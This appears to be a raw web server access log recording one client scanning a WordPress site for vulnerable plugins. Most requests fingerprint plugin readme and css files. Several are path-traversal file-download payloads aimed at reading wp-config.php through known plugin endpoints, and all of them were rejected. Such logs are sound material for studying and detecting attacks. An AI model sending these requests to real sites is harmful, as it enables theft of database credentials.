-	14:05:14	-0500	GET /wp-content/plugins/wp-time-capsule/readme.txt HTTP/1.1	404	69239	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:18	-0500	GET /wp-content/plugins/dzs-zoomsounds/admin/admin.css HTTP/1.1	404	69239	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:19	-0500	GET /wp-content/plugins/mapsvg-lite-interactive-vector-maps/gm_download.php?file=/wp-config.php HTTP/1.1	404	69239	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:20	-0500	GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php HTTP/1.1	404	69239	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:20	-0500	GET /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1	403	17036	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:20	-0500	GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1	403	17036	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:22	-0500	GET /wp-content/plugins/nd-shortcodes/readme.txt HTTP/1.1	404	69239	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:23	-0500	GET /wp-content/plugins/nd-donations/readme.txt HTTP/1.1	404	69238	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:25	-0500	GET /wp-content/plugins/wp-user-avatar/changelog.txt HTTP/1.1	404	69239	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:30	-0500	GET / HTTP/1.1	200	71645	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:31	-0500	GET /wp-content/plugins/quiz-master-next/readme.txt HTTP/1.1	404	69239	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:32	-0500	GET /wp-content/plugins/wp-live-chat-support-pro/css/wplc_styles_pro.css HTTP/1.1	404	69239	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:33	-0500	GET /wp-content/plugins/armember-membership/readme.txt HTTP/1.1	404	69239	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:05:58	-0500	GET /wp-content/plugins/woo-product-table/readme.txt HTTP/1.1	503	19015	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:06:06	-0500	GET /wp-content/plugins/nd-restaurant-reservations/readme.txt HTTP/1.1	503	18101	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:06:37	-0500	GET /wp-content/plugins/nd-learning/readme.txt HTTP/1.1	503	18101	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:07:02	-0500	GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php HTTP/1.1	404	18101	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	14:07:02	-0500	GET /wp-content/plugins/nd-booking/readme.txt HTTP/1.1	503	18101	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	15:06:06	-0500	GET /wp-content/plugins/nd-restaurant-reservations/readme.txt HTTP/1.1	503	18101	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	15:06:37	-0500	GET /wp-content/plugins/nd-learning/readme.txt HTTP/1.1	503	18101	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
-	15:07:03	-0500	GET /wp-content/plugins/nd-booking/readme.txt HTTP/1.1	503	18101	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
